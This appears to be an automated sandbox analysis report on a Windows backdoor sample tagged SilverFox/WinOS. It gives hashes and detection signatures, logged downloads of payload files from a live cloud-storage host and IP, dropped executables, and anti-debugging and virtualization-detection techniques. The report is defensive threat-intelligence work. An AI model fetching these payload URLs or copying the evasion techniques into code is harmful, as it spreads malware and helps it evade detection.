
Windows Analysis Report
1387457-38765948.15.exe

Overview

General Information

Sample name: 1387457-38765948.15.exe
Analysis ID: 1589380
MD5: 947cd5df10d540b879c037c1cb519e63
SHA1: 8e4f326d08b675c077dc1d19246bac5eaa0f73dc
SHA256: 29f92fd013bdfc23e6b1a088f68b7bf4acf423bcc440d0ff49ac0079a38c5072
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Searches for specific processes (likely to inject)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1387457-38765948.15.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\1387457-38765948.15.exe" MD5: 947CD5DF10D540B879C037C1CB519E63)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: 1387457-38765948.15.exe | Virustotal: Detection: 8%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 47.101.26.25:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: Binary string: C:\BuildAgent\work\897482836e9bb448\_bin\Release\ps64ldr.pdb | source: 1387457-38765948.15.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140004094 GetModuleFileNameW,StrCpyW,PathAppendW,StrCatW,FindFirstFileW
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400042D0 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary,StrCpyW,FindNextFileW,FindClose,FindFirstFileW,StrCmpIW,StrCpyW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,StrCpyW,StrCpyW,PathAppendW
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_000000014000AB44 FindFirstFileExW
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_005AFA05 InternetOpenA,InternetOpenUrlA,InternetReadFile
Source: global traffic | HTTP traffic detected: GET /i.dat HTTP/1.1 | User-Agent: 3M | Host: jcoiw1.oss-cn-shanghai.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /a.gif HTTP/1.1 | User-Agent: 3M | Host: jcoiw1.oss-cn-shanghai.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /b.gif HTTP/1.1 | User-Agent: 3M | Host: jcoiw1.oss-cn-shanghai.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /c.gif HTTP/1.1 | User-Agent: 3M | Host: jcoiw1.oss-cn-shanghai.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: jcoiw1.oss-cn-shanghai.aliyuncs.com
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff7
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giffS
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifnet-cn
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifta
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif;6?
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifIQ
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifY
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifcn-sha
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giff7
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giffO
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifom
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifshangh
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/hanghai.aliyuncs.com/
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dat
Source: 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.datC:
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dats
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/o
Source: 1387457-38765948.15.exeString found in binary or memory: https://www.globalsign.com/repository/0
Source: 1387457-38765948.15.exeString found in binary or memory: https://yandex.com0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown | Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown | HTTPS traffic detected: 47.101.26.25:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_000000014000A914
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140004580
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140009248
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_000000014000F6B8
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_005B2445
Source: Joe Sandbox View | Dropped File: C:\Users\user\Documents\c4wtKa.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 1387457-38765948.15.exe | Static PE information: invalid certificate
Source: 1387457-38765948.15.exe | Binary or memory string: OriginalFilename vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000000.2045995039.0000000141D76000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSa.dllp( vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe, 00000000.00000002.3289281235.0000000005CB0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe
Source: 1387457-38765948.15.exe | Binary or memory string: OriginalFilenameps64ldr.exe> vs 1387457-38765948.15.exe
Source: classification engine | Classification label: mal72.evad.winEXE@1/5@1/1
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\i[1].dat
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: 1387457-38765948.15.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1387457-38765948.15.exe | Virustotal: Detection: 8%
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | File read: C:\Users\user\Desktop\1387457-38765948.15.exe
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: pid.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: hid.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 1387457-38765948.15.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 1387457-38765948.15.exe | Static file information: File size 30954656 > 1048576
Source: 1387457-38765948.15.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 1387457-38765948.15.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1387457-38765948.15.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1387457-38765948.15.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1387457-38765948.15.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1387457-38765948.15.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1387457-38765948.15.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 1387457-38765948.15.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\BuildAgent\work\897482836e9bb448\_bin\Release\ps64ldr.pdb source: 1387457-38765948.15.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr
Source: 1387457-38765948.15.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1387457-38765948.15.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1387457-38765948.15.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1387457-38765948.15.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1387457-38765948.15.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140004150 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_001F36AA pushad ; iretd 0_2_001F36B3
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_001F1AEE push ss; iretd 0_2_001F1AEF
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_001F4B0E push ss; iretd 0_2_001F4B0F
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_001F43DB push 0000001Bh; iretd 0_2_001F43DD
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_005B4D48 push eax; retf 0_2_005B4D49

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\1387457-38765948.15.exe | File created: C:\Users\user\Documents\vselog.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | File created: C:\Users\user\Documents\c4wtKa.exe

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400010FC
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | RDTSC instruction interceptor: First address: 14000111B second address: 140001132 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | RDTSC instruction interceptor: First address: 140001132 second address: 140001132 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FBF08D66110h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400010FC rdtsc
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Window / User API: threadDelayed 694
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Dropped PE file which has not been started: C:\Users\user\Documents\vselog.dll
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Dropped PE file which has not been started: C:\Users\user\Documents\c4wtKa.exe
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | API coverage: 4.3 %
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656 | Thread sleep count: 694 > 30
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656 | Thread sleep time: -347000s >= -30000s
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656 | Thread sleep count: 305 > 30
Source: C:\Users\user\Desktop\1387457-38765948.15.exe TID: 2656 | Thread sleep time: -152500s >= -30000s
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140004094 GetModuleFileNameW,StrCpyW,PathAppendW,StrCatW,FindFirstFileW
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400042D0 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary,StrCpyW,FindNextFileW,FindClose,FindFirstFileW,StrCmpIW,StrCpyW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,StrCpyW,StrCpyW,PathAppendW
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_000000014000AB44 FindFirstFileExW
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_005AD895 GetSystemInfo
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | API call chain: ExitProcess graph end node graph_0-8362
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | API call chain: ExitProcess graph end node graph_0-8365
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | API call chain: ExitProcess graph end node graph_0-8367
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | API call chain: ExitProcess graph end node graph_0-8371
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | API call chain: ExitProcess graph end node graph_0-8356
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400010FC rdtsc
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140008218 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400046C8 GetLastError,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140004150 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_000000014000FC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_000000014000510C SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140008218 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_0000000140004F24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\1387457-38765948.15.exe | NtDelayExecution: Indirect: 0x1F94CC
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_000000014000F290 cpuid
Source: C:\Users\user\Desktop\1387457-38765948.15.exe | Code function: 0_2_00000001400052E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
